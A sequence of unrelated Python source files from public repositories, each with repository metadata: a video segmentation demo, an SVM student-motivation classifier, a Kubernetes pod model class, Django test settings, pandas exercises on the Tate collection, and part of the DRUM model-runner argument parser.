parser.add_argument('opts',
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--source',
help="Video path",
default='challenge.mp4')
parser.add_argument('--show',
default=False,
type=bool,
help='If True display video')
args, unknown = parser.parse_known_args()
update_config(config, args)
return args
def main():
args = parse_args()
logger, final_output_dir, _ = create_logger(
config, args.cfg, 'test')
#logger.info(pprint.pformat(args))
#logger.info(pprint.pformat(config))
# cudnn related setting
cudnn.benchmark = config.CUDNN.BENCHMARK
cudnn.deterministic = config.CUDNN.DETERMINISTIC
cudnn.enabled = config.CUDNN.ENABLED
# build model
module = eval('models.'+config.MODEL.NAME)
module.BatchNorm2d_class = module.BatchNorm2d = torch.nn.BatchNorm2d
model = eval('models.'+config.MODEL.NAME +
'.get_seg_model')(config)
if config.TEST.MODEL_FILE:
model_state_file = config.TEST.MODEL_FILE
else:
model_state_file = 'pretrained_models/hrnet_ocr_cs_8162_torch11.pth'
logger.info('=> loading model from {}'.format(model_state_file))
pretrained_dict = torch.load(model_state_file)
if 'state_dict' in pretrained_dict:
pretrained_dict = pretrained_dict['state_dict']
model_dict = model.state_dict()
pretrained_dict = {k[6:]: v for k, v in pretrained_dict.items()
if k[6:] in model_dict.keys()}
#for k, _ in pretrained_dict.items():
# logger.info(
# '=> loading {} from pretrained model'.format(k))
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
device = torch.device('cuda:0')
model.to(device).cuda()
# prepare data
test_size = (config.TEST.IMAGE_SIZE[1], config.TEST.IMAGE_SIZE[0])
cap = cv2.VideoCapture(args.source)
times_infer, times_pipe = [], []
model.eval()
bdataset = BaseDataset(num_classes=config.DATASET.NUM_CLASSES,
ignore_label=config.TRAIN.IGNORE_LABEL,
base_size=config.TEST.BASE_SIZE,
crop_size=test_size,
downsample_rate=1)
map16 = Map16()
while True:
ret, image = cap.read()
#image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, test_size)
h, w, _ = image.shape
size = (h, w)
image = bdataset.input_transform(image)
image = image.transpose((2, 0, 1))
t0 = time.time()
with torch.no_grad():
pred = bdataset.multi_scale_inference(config, model, image)
if pred.size()[-2] != size[0] or pred.size()[-1] != size[1]:
pred = F.interpolate(
pred, size[-2:],
mode='bilinear', align_corners=config.MODEL.ALIGN_CORNERS
)
image = image.transpose((1,2,0))
image *= [0.229, 0.224, 0.225]
image += [0.485, 0.456, 0.406]
image *= 255.0
image = image.astype(np.uint8)
_, pred = torch.max(pred, dim=1)
pred = pred.squeeze(0).cpu().numpy()
print("Output shape: ", pred.shape)
img8_out = map16.visualize_result(image, pred)
#Scaling to preserve Aspect ratio
img8_out = cv2.resize(img8_out, (1024, 512), interpolation=cv2.INTER_AREA)
t1 = time.time()
t2 = time.time()
times_infer.append(t1-t0)
times_pipe.append(t2-t0)
times_infer = times_infer[-20:]
times_pipe = times_pipe[-20:]
ms = sum(times_infer)/len(times_infer)*1000
fps_infer = 1000 / (ms+0.00001)
fps_pipe = 1000 / (sum(times_pipe)/len(times_pipe)*1000)
img8_out = cv2.putText(img8_out, "Time: {:.1f}FPS".format(fps_infer), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if args.show:
cv2.imshow("DDRNET", img8_out)
if cv2.waitKey(1) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
print("Inference Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps_infer, fps_pipe))
cap.release()
if __name__ == '__main__':
main()
| 31.075145 | 135 | 0.614955 |
3fac3a14203b6410dff0fb8df0083bd633c083c6 | 7,487 | py | Python | src/classification/svm.py | ShNadi/study_motivation | cff7c3995e69ce2d91d0a2753b57d8089df3cad2 | [
"MIT"
] | null | null | null | src/classification/svm.py | ShNadi/study_motivation | cff7c3995e69ce2d91d0a2753b57d8089df3cad2 | [
"MIT"
] | null | null | null | src/classification/svm.py | ShNadi/study_motivation | cff7c3995e69ce2d91d0a2753b57d8089df3cad2 | [
"MIT"
] | null | null | null | # Last update 25-07-2021
# Remove reenrolled from the list of features
# change the target variable from bsa_dummy to reenrolled
# add df['program'] to the list of features
import pandas as pd
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import PolynomialFeatures
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from imblearn.over_sampling import SMOTE
from sklearn.model_selection import train_test_split
from imblearn.pipeline import Pipeline
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import matplotlib.pyplot as plt
def svm_numeric(df):
# In target column (bsa_dummy), 0 stands for bsa obtained and 1 stands for bsa not obtained
# Remove extra columns
del df['language']
del df['motivation']
# del df['program']
del df['studentnr_crypt']
df = df.fillna(method='ffill')
# Select categorical features
categorical_features = ['cohort', 'field', 'prior_educ', 'previously_enrolled', 'multiple_requests', 'gender',
'interest', 'ase', 'year', 'program']
# Select numeric features
numeric_features = ['age', 'HSGPA', 'WC', 'WPS', 'Sixltr',
'Dic', 'funct', 'pronoun', 'ppron', 'i',
'we', 'you', 'shehe', 'they', 'ipron',
'article', 'verb', 'auxverb', 'past', 'present',
'future', 'adverb', 'preps', 'conj', 'negate',
'quant', 'number', 'swear', 'social', 'family',
'friend', 'humans', 'affect', 'posemo', 'negemo',
'anx', 'anger', 'sad', 'cogmech', 'insight',
'cause', 'discrep', 'tentat', 'certain', 'inhib',
'incl', 'excl', 'percept', 'see', 'hear',
'feel', 'bio', 'body', 'health', 'sexual',
'ingest', 'relativ', 'motion', 'space', 'time',
'work', 'achieve', 'leisure', 'home', 'money',
'relig', 'death', 'assent', 'nonfl', 'filler',
'pronadv', 'shehethey', 'AllPunc', 'Period', 'Comma',
'Colon', 'SemiC', 'QMark', 'Exclam', 'Dash',
'Quote', 'Apostro', 'Parenth', 'OtherP', 'count_punct',
'count_stopwords', 'nr_token', 'nr_adj', 'nr_noun', 'nr_verb',
'nr_number', 'topic1', 'topic2', 'topic3', 'topic4',
'topic5', 'topic6', 'topic7', 'topic8', 'topic9',
'topic10', 'topic11', 'topic12', 'topic13', 'topic14',
'topic15']
# Change object (string) type of features to float
change_type = ['WPS', 'Sixltr',
'Dic', 'funct', 'pronoun', 'ppron', 'i',
'we', 'you', 'shehe', 'they', 'ipron',
'article', 'verb', 'auxverb', 'past', 'present',
'future', 'adverb', 'preps', 'conj', 'negate',
'quant', 'number', 'swear', 'social', 'family',
'friend', 'humans', 'affect', 'posemo', 'negemo',
'anx', 'anger', 'sad', 'cogmech', 'insight',
'cause', 'discrep', 'tentat', 'certain', 'inhib',
'incl', 'excl', 'percept', 'see', 'hear',
'feel', 'bio', 'body', 'health', 'sexual',
'ingest', 'relativ', 'motion', 'space', 'time',
'work', 'achieve', 'leisure', 'home', 'money',
'relig', 'death', 'assent', 'nonfl', 'filler',
'pronadv', 'shehethey', 'AllPunc', 'Period', 'Comma',
'Colon', 'SemiC', 'QMark', 'Exclam', 'Dash',
'Quote', 'Apostro', 'Parenth', 'OtherP']
df[change_type] = df[change_type].apply(lambda x: x.str.replace(',', '.'))
df[change_type] = df[change_type].astype(float).fillna(0.0)
# Scaling features
# Apply standard scaler to numerical features
numeric_transformer = Pipeline(steps=[('scaler', StandardScaler())])
# Apply one hot-encoding for categorical columns
categorical_transformer = Pipeline(steps=[
('onehot', OneHotEncoder(handle_unknown='ignore'))])
# Combine both numerical and categorical column
preprocessor = ColumnTransformer(
transformers=[
('num', numeric_transformer, numeric_features),
('cat', categorical_transformer, categorical_features)])
# Define the SMOTE and Logistic Regression algorithms
smt = SMOTE(random_state=42)
lor = SVC(kernel='linear')
# Chain all the steps using the Pipeline module
clf = Pipeline([('preprocessor', preprocessor), ('smt', smt),
('lor', lor)])
# Split the data into train and test folds and fit the train set using chained pipeline
y = df['bsa_dummy']
# y = df['reenrolled']
X = df.drop('bsa_dummy', axis=1)
# X = df.drop('reenrolled', axis=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=50, shuffle=True, stratify=y)
clf.fit(X_train, y_train)
# Train score
print('train score: ', clf.score(X_train, y_train))
with open('../../results/output/classification_reports/svm/remove_reenrolled_bsa_is_target/report.txt', 'a+') as f:
print('train score: ', clf.score(X_train, y_train), file=f)
# Test score
print('test score: ', clf.score(X_test, y_test))
with open('../../results/output/classification_reports/svm/remove_reenrolled_bsa_is_target/report.txt', 'a+') as f:
print('\n', file=f)
print('test score: ', clf.score(X_test, y_test), file=f)
# Predict results on the test set
clf_predicted = clf.predict(X_test)
# Build confusion matrix
confusion = confusion_matrix(y_test, clf_predicted)
print(confusion)
with open('../../results/output/classification_reports/svm/remove_reenrolled_bsa_is_target/report.txt', 'a+') as f:
print('\n', confusion, file=f)
# Print classification report
print(classification_report(y_test, clf_predicted, target_names=['0', '1']))
with open('../../results/output/classification_reports/svm/remove_reenrolled_bsa_is_target/report.txt', 'a+') as f:
print('\n', classification_report(y_test, clf_predicted, target_names=['0', '1']), file=f)
# Extract feature importance
importance = clf.steps[2][1].coef_
feature_names = numeric_features + categorical_features
# Zip feature importance and feature names in the format of dictionary
coef_dict = {}
for coef, feat in zip(clf.steps[2][1].coef_[0, :], feature_names):
coef_dict[feat] = coef
# Sort feature_importance values
coef_dict = dict(sorted(coef_dict.items(), key=lambda item: item[1]))
# Turn dictionary to series
feature_importance = pd.Series(list(coef_dict.values()), index=coef_dict.keys())
with open('../../results/output/classification_reports/svm/remove_reenrolled_bsa_is_target/feature_importance.txt'
'', 'w') as f:
with pd.option_context('display.max_rows', None, 'display.max_columns', None):
print(feature_importance, file=f)
# Plot feature importance
feature_importance.plot.barh(figsize=(15, 25))
plt.show()
if __name__ == '__main__':
df = pd.read_csv(r'..\..\data\processed\motivation_liwc_meta_pos_topic_n15.csv')
svm_numeric(df)
| 46.216049 | 119 | 0.59423 |
501015b220df0ca6cbc83ab68ce433831afa7599 | 7,123 | py | Python | kubernetes/client/models/v1_pod.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_pod.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_pod.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1Pod(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
"""
V1Pod - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1PodSpec',
'status': 'V1PodStatus'
}
self.attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
self._api_version = api_version
self._kind = kind
self._metadata = metadata
self._spec = spec
self._status = status
@property
def api_version(self):
"""
Gets the api_version of this V1Pod.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1Pod.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1Pod.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1Pod.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1Pod.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1Pod.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1Pod.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1Pod.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1Pod.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:return: The metadata of this V1Pod.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1Pod.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:param metadata: The metadata of this V1Pod.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""
Gets the spec of this V1Pod.
Specification of the desired behavior of the pod. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The spec of this V1Pod.
:rtype: V1PodSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""
Sets the spec of this V1Pod.
Specification of the desired behavior of the pod. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param spec: The spec of this V1Pod.
:type: V1PodSpec
"""
self._spec = spec
@property
def status(self):
"""
Gets the status of this V1Pod.
Most recently observed status of the pod. This data may not be up to date. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The status of this V1Pod.
:rtype: V1PodStatus
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this V1Pod.
Most recently observed status of the pod. This data may not be up to date. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param status: The status of this V1Pod.
:type: V1PodStatus
"""
self._status = status
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1Pod):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 32.085586 | 281 | 0.600168 |
fc2314548f4242789ede650a0fea27dbacac7377 | 1,753 | py | Python | config/settings/test.py | badri/openshift-demo | 261240727df6363507511b1d3f9706943e463bf7 | [
"MIT"
] | null | null | null | config/settings/test.py | badri/openshift-demo | 261240727df6363507511b1d3f9706943e463bf7 | [
"MIT"
] | null | null | null | config/settings/test.py | badri/openshift-demo | 261240727df6363507511b1d3f9706943e463bf7 | [
"MIT"
] | null | null | null | """
With these settings, tests run faster.
"""
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env(
"DJANGO_SECRET_KEY",
default="B33p6H4q8iHkLunpTvYGqJsFkFtDawugvWAcKS61Ekzpmldbj4VvD0BQ2HaGdt8W",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#test-runner
TEST_RUNNER = "django.test.runner.DiscoverRunner"
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
"default": {
"BACKEND": "django.core.cache.backends.locmem.LocMemCache",
"LOCATION": "",
}
}
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = ["django.contrib.auth.hashers.MD5PasswordHasher"]
# TEMPLATES
# ------------------------------------------------------------------------------
TEMPLATES[0]["OPTIONS"]["loaders"] = [ # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = "django.core.mail.backends.locmem.EmailBackend"
# Your stuff...
# ------------------------------------------------------------------------------
| 32.462963 | 80 | 0.50656 |
ce803ba0760ec17422556dbfafd6254aadbdf5a5 | 4,319 | py | Python | indexing_filtering.py | Nishant-Mishra/python-pandas-fundamentals | e10c979d9e684a5fb1a54fa7430266052e8388f2 | [
"MIT"
] | null | null | null | indexing_filtering.py | Nishant-Mishra/python-pandas-fundamentals | e10c979d9e684a5fb1a54fa7430266052e8388f2 | [
"MIT"
] | null | null | null | indexing_filtering.py | Nishant-Mishra/python-pandas-fundamentals | e10c979d9e684a5fb1a54fa7430266052e8388f2 | [
"MIT"
] | null | null | null | """
Using the previous dataset, we will try to answer following questions:
1. Number of distinct artists
2. How many artworks by 'Robert Blake'
3. Artwork with biggest area
----
4. Oldest Acquired Artwork
5. Total number of artworks created using Acrylic or Oil paints.
6. Total artworks acquired on any given year
7. Number of Artworks with unknown titles
While doing this, we will learn indexing and filtering tools available in Pandas
"""
import pandas as pd
def read_tate_dataset() -> pd.DataFrame:
dataset_path = '../datasets/tate_dataset_full_df.gz'
dataset = pd.read_pickle(dataset_path, compression='infer')
return dataset
def task1(df: pd.DataFrame):
print("Task 1: Read distinct artists count")
distinct_artists = pd.unique(df.loc[:, 'artist'])
count_distinct_artists = len(distinct_artists)
print(f"Value: {count_distinct_artists}")
def task2(df: pd.DataFrame):
print("Task 2: Number of artworks by 'Robert Blake'")
artworks_per_artist = df['artist'].value_counts()
artworks_by_robert = artworks_per_artist['Blake, Robert']
print(f"Value: {artworks_by_robert}")
def task3(df: pd.DataFrame):
print("Task 3: Artwork with largest area")
widths = df.loc[:, 'width']
heights = df.loc[:, 'height']
# Convert the values in 'width' or 'height' column to float and convert non-numeric values to Nan
widths = pd.to_numeric(widths, errors='coerce') # type: pd.Series
heights = pd.to_numeric(heights, errors='coerce') # type: pd.Series
# Calculate
area = widths * heights
df = df.assign(area=area)
max_area = df.loc[:, 'area'].max()
idx_max_area = df.loc[:, 'area'].idxmax()
print(f"Area: {max_area}\nArtwork:\n{df.loc[idx_max_area, :]}")
def task4(df: pd.DataFrame):
print("Task 4: Oldest Acquired Artwork")
acquired_year = df.loc[:, 'acquisitionYear'] # type: pd.DataFrame
acquired_year = pd.to_numeric(acquired_year, errors='coerce')
oldest_year = acquired_year.min()
oldest = df.loc[acquired_year.idxmin(), :]
print(f"Year: {int(oldest_year)}\nArtwork:\n{oldest}")
def task5(df: pd.DataFrame):
print("Task 5: Total number of artworks created using Oil or Acrylic Paints")
mediums = df.loc[:, 'medium'] # type: pd.Series
# pd.Series.str provides access to all String operations on each member of Series.
oil_paint_artworks = mediums.str.lower().str.startswith('oil')
acrylic_paint_artworks = mediums.str.lower().str.startswith('acrylic')
# The biwise OR does elemnt-wise OR or each element in Series
row_filter = oil_paint_artworks | acrylic_paint_artworks
# Filter all oil and acrylic artworks
oil_or_acrylic_artworks = df.loc[row_filter, :] # type: pd.DataFrame
cnt_oil_or_acrylic_artworks = len(oil_or_acrylic_artworks)
print(f"Value: {cnt_oil_or_acrylic_artworks}")
def task6(df: pd.DataFrame, year):
print(f"Task 6: Total artworks acquired in the year {year}")
acquisitionYear = df.loc[:, 'acquisitionYear'] # type: pd.Series
acquisitionYear = pd.to_numeric(acquisitionYear, errors='coerce')
row_filter = (acquisitionYear == year)
artworks_for_given_year = df.loc[row_filter, :]
cnt_artworks = len(artworks_for_given_year)
print(f"Value: {cnt_artworks}")
def task7(df: pd.DataFrame):
print("Task 7: Number of artworks with unknown titles")
titles = df.loc[:, 'title'] # type: pd.Series
title_counts = titles.value_counts() # type: pd.Series
title_counts.sort_values(inplace=True)
probable_unknown_titles = title_counts.tail(10)
# As observed manually from the value of probable_unknown_titles, bottom 5 are the unknown ones
unknown_titles = probable_unknown_titles.tail(5)
cnt_unknown_titles = unknown_titles.sum()
print(f"Value: {cnt_unknown_titles}")
if __name__ == '__main__':
tate_dataset_df = read_tate_dataset()
task1(tate_dataset_df)
print()
task2(tate_dataset_df)
print()
task3(tate_dataset_df)
print()
task4(tate_dataset_df)
print()
task5(tate_dataset_df)
print()
year = input("Enter Acquisition Year for which total artworks are needed: ")
task6(tate_dataset_df, int(year))
print()
task7(tate_dataset_df)
print()
| 33.48062 | 101 | 0.69831 |
6463ba3a24c9bf3655f50908360dd5bc6f1e6836 | 274 | py | Python | simple_one/pandas_play.py | rodonguyen/vres_code_2021 | cb49d941db4dfc5137e887b195f403fb4262cfd8 | [
"MIT"
] | null | null | null | simple_one/pandas_play.py | rodonguyen/vres_code_2021 | cb49d941db4dfc5137e887b195f403fb4262cfd8 | [
"MIT"
] | null | null | null | simple_one/pandas_play.py | rodonguyen/vres_code_2021 | cb49d941db4dfc5137e887b195f403fb4262cfd8 | [
"MIT"
] | null | null | null | import pandas as pd
df = pd.DataFrame({
"A": 1.0,
"B": pd.Timestamp("20130102"),
"C": pd.Series(1, index=list(range(4)), dtype="float32"),
"E": pd.Categorical(["test", "train", "test", "train"]),
"F": "foo",
})
print(df.head(1)) | 24.909091 | 65 | 0.5 |
cc78c0333e369487410e5890b5db7ffab513a644 | 40,003 | py | Python | custom_model_runner/datarobot_drum/drum/args_parser.py | amperie/user-models | 5236c50d0f20a7bac81acc5d1936a3502de2f5f3 | [
"Apache-2.0"
] | null | null | null | custom_model_runner/datarobot_drum/drum/args_parser.py | amperie/user-models | 5236c50d0f20a7bac81acc5d1936a3502de2f5f3 | [
"Apache-2.0"
] | null | null | null | custom_model_runner/datarobot_drum/drum/args_parser.py | amperie/user-models | 5236c50d0f20a7bac81acc5d1936a3502de2f5f3 | [
"Apache-2.0"
] | null | null | null | import argparse
import os
from datarobot_drum.drum.push import PUSH_HELP_TEXT
import sys
import subprocess
from datarobot_drum.drum.description import version
from datarobot_drum.drum.common import (
LOG_LEVELS,
ArgumentsOptions,
RunLanguage,
TargetType,
ArgumentOptionsEnvVars,
)
class CMRunnerArgsRegistry(object):
SUBPARSER_DEST_KEYWORD = "subparser_name"
NEW_SUBPARSER_DEST_KEYWORD = "new_mode"
_parsers = {}
@staticmethod
def _tokenize_parser_prog(parser):
# example:
# - for score_parser prog is "drum score"
# - for new_model_parser prog is "drum new model"
return parser.prog.split(" ")
@staticmethod
def _reg_arg_version(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.VERSION,
action="version",
version="%(prog)s {version}".format(version=version),
)
@staticmethod
def _reg_arg_verbose(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.VERBOSE,
action="store_true",
default=False,
help="Show verbose output",
)
@staticmethod
def _is_valid_file(arg):
abs_path = os.path.abspath(arg)
if not os.path.exists(arg):
raise argparse.ArgumentTypeError("The file {} does not exist!".format(arg))
else:
return os.path.realpath(abs_path)
@staticmethod
def _is_valid_dir(arg):
abs_path = os.path.abspath(arg)
if not os.path.isdir(arg):
raise argparse.ArgumentTypeError("The path {} is not a directory!".format(arg))
else:
return os.path.realpath(abs_path)
@staticmethod
def _is_valid_output_dir(arg):
abs_path = os.path.abspath(arg)
if not os.path.isdir(arg):
raise argparse.ArgumentTypeError(
"The path {} is not a directory! For custom tasks, "
"the output directory will consist of the artifacts usable "
"for making predictions. ".format(arg)
)
else:
return os.path.realpath(abs_path)
@staticmethod
def _path_does_non_exist(arg):
if os.path.exists(arg):
raise argparse.ArgumentTypeError(
"The path {} already exists! Please provide a non existing path!".format(arg)
)
return os.path.abspath(arg)
@staticmethod
def _reg_arg_input(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.INPUT,
default=None,
required=True,
type=CMRunnerArgsRegistry._is_valid_file,
help="Path to an input dataset",
)
@staticmethod
def _reg_arg_output(*parsers):
for parser in parsers:
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
if prog_name_lst[1] == ArgumentsOptions.SCORE:
help_message = "Path to a csv file to output predictions"
type_callback = os.path.abspath
elif prog_name_lst[1] == ArgumentsOptions.FIT:
help_message = (
"DRUM will copy the contents of code_dir and create "
"the model artifact in the output folder"
)
type_callback = CMRunnerArgsRegistry._is_valid_output_dir
else:
raise ValueError(
"{} argument should be used only by score and fit parsers!".format(
ArgumentsOptions.OUTPUT
)
)
parser.add_argument(
ArgumentsOptions.OUTPUT, default=None, type=type_callback, help=help_message
)
@staticmethod
def _reg_arg_target_feature_and_filename(*parsers):
for parser in parsers:
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
ArgumentsOptions.TARGET,
type=str,
required=False,
help="Which column to use as the target. Argument is mutually exclusive with {}.".format(
ArgumentsOptions.TARGET_CSV
),
)
group.add_argument(
ArgumentsOptions.TARGET_CSV,
type=CMRunnerArgsRegistry._is_valid_file,
required=False,
help="A file containing the target values. Argument is mutually exclusive with {}.".format(
ArgumentsOptions.TARGET
),
)
@staticmethod
def _reg_arg_weights(*parsers):
for parser in parsers:
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
ArgumentsOptions.WEIGHTS,
type=str,
required=False,
default=None,
help="A column name of row weights in your training dataframe. "
"Argument is mutually exclusive with {}".format(ArgumentsOptions.WEIGHTS_CSV),
)
group.add_argument(
ArgumentsOptions.WEIGHTS_CSV,
type=CMRunnerArgsRegistry._is_valid_file,
required=False,
default=None,
help="A one column csv file to be parsed as row weights. "
"Argument is mutually exclusive with {}".format(ArgumentsOptions.WEIGHTS),
)
@staticmethod
def _reg_arg_skip_predict(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.SKIP_PREDICT,
required=False,
default=False,
action="store_true",
help="By default we will attempt to predict using your model, but we give you the"
"option to turn this off",
)
@staticmethod
def _reg_arg_pos_neg_labels(*parsers):
def are_both_labels_present(arg):
error_message = (
"\nError - for binary classification case, "
"both positive and negative class labels have to be provided. \n"
"See --help option for more information"
)
labels = [ArgumentsOptions.POSITIVE_CLASS_LABEL, ArgumentsOptions.NEGATIVE_CLASS_LABEL]
if not all([x in sys.argv for x in labels]):
raise argparse.ArgumentTypeError(error_message)
return str(arg)
for parser in parsers:
fit_intuit_message = ""
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
if prog_name_lst[1] == ArgumentsOptions.FIT:
fit_intuit_message = "If you do not provide these labels, but your dataset is classification, DRUM will choose the labels for you."
parser.add_argument(
ArgumentsOptions.POSITIVE_CLASS_LABEL,
default=None,
type=are_both_labels_present,
help="Positive class label for a binary classification case. The argument can also be provided by setting {} env var. ".format(
ArgumentOptionsEnvVars.POSITIVE_CLASS_LABEL
)
+ fit_intuit_message,
)
parser.add_argument(
ArgumentsOptions.NEGATIVE_CLASS_LABEL,
default=None,
type=are_both_labels_present,
help="Negative class label for a binary classification case. The argument can also be provided by setting {} env var. ".format(
ArgumentOptionsEnvVars.NEGATIVE_CLASS_LABEL
)
+ fit_intuit_message,
)
@staticmethod
def _reg_arg_multiclass_labels(*parsers):
class RequiredLength(argparse.Action):
ERROR_MESSAGE = "Multiclass classification requires at least 2 labels."
MIN_LABELS = 2
def __call__(self, parser, namespace, values, option_string=None):
if len(values) < self.MIN_LABELS:
raise argparse.ArgumentTypeError(self.ERROR_MESSAGE)
setattr(namespace, self.dest, values)
class ParseLabelsFile(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
with open(values) as f:
labels = [label for label in f.read().split(os.linesep) if label]
if len(labels) < RequiredLength.MIN_LABELS:
raise argparse.ArgumentTypeError(RequiredLength.ERROR_MESSAGE)
setattr(namespace, "class_labels", labels)
def are_labels_double_specified(arg):
label_options = [ArgumentsOptions.CLASS_LABELS_FILE, ArgumentsOptions.CLASS_LABELS]
if all(opt in sys.argv for opt in label_options):
error_message = (
"\nError - for multiclass classification, either the class labels or "
"a class labels file should be provided, but not both.\n"
"See --help option for more information"
)
raise argparse.ArgumentTypeError(error_message)
return arg
for parser in parsers:
fit_intuit_message = ""
class_label_order_message = (
"Labels should be in the order as "
"the predicted probabilities produced by the model. "
)
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
if prog_name_lst[1] == ArgumentsOptions.FIT:
fit_intuit_message = (
"If you do not provide these labels, but your dataset is classification, "
"DRUM will choose the labels for you"
)
parser.add_argument(
ArgumentsOptions.CLASS_LABELS,
default=None,
type=are_labels_double_specified,
nargs="+",
action=RequiredLength,
help="The class labels for a multiclass classification case. The argument can also be provided by setting {} env var. ".format(
ArgumentOptionsEnvVars.CLASS_LABELS
)
+ class_label_order_message
+ fit_intuit_message,
)
parser.add_argument(
ArgumentsOptions.CLASS_LABELS_FILE,
default=None,
type=are_labels_double_specified,
action=ParseLabelsFile,
help="A file containing newline separated class labels for a multiclass classification case. The argument can also be provided by setting {} env var. ".format(
ArgumentOptionsEnvVars.CLASS_LABELS_FILE
)
+ class_label_order_message
+ fit_intuit_message,
)
@staticmethod
def _reg_arg_code_dir(*parsers):
for parser in parsers:
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
if prog_name_lst[1] == ArgumentsOptions.NEW:
help_message = "Directory to use for creating the new template"
type_callback = CMRunnerArgsRegistry._path_does_non_exist
else:
help_message = "Custom model code dir"
